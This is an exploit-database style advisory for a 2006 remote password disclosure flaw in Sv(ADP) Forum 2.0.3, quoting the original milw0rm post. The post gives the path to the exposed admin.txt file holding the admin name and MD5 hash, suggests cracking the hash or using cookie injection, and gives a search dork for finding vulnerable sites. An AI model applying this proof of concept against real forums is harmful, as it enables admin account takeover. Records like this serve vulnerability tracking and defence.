Sv(ADP) Forum 2.0.3 Remote Password Disclosure Vulnerability

vendor:

ADP Forum

by:

Dr Max Virus

CVSS

CRITICAL

Remote Password Disclosure

N/A

CWE

Product Name: ADP Forum

Affected Version From: 2.0.3

Affected Version To: 2.0.3

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2006

Sv(ADP) Forum 2.0.3 Remote Password Disclosure Vulnerability

A vulnerability in Sv(ADP) Forum 2.0.3 allows an attacker to remotely disclose the admin password by accessing the admin.txt file. The attacker can also register and inject the info in any cookie editor such as FireFox or Opera.

Mitigation:

Ensure that the admin.txt file is not accessible to unauthorized users.

Source

Exploit-DB raw data:

##########################################################################################################
#Sv(ADP) Forum 2.0.3 Remote Password Disclosure Vulnerablity                 
##########################################################################################################
#S.name:ADP Forum                                                            
#Affected version:2.0.3                                                      
#Download&Demo:http://www.linux.it/~fedro/index.php?pag=scripts&lang=en      
#Risk:Very Highly Critical                                                   
##########################################################################################################
#Author:Dr Max Virus                                                         
#Location:Egypt                                                              
##########################################################################################################
#POC:                                                                        
#http:/[target]/[path]/users/admin.txt                                       
#As We see Admin name and hash          !!!!!!!!!!!!!!!!!!!!!!!!!!
##########################################################################################################
#You can crack the password with any md5 encrypt                             
                             
#Or u can register and inject the info in any cookie editor can be in 
FireFox or Opera                   
##########################################################################################################
#Dork:ADP Forum 2.0.3 is powered by VzScripts                                
##########################################################################################################
#Thx:str0ke-koray-Timq-r0ut3r-mTk-nuffsaid-MrSwan-All Friends                
#Special Gr33ts:AsianEagle-Kacper-The master-Hotturk                         
##########################################################################################################

# milw0rm.com [2006-12-31]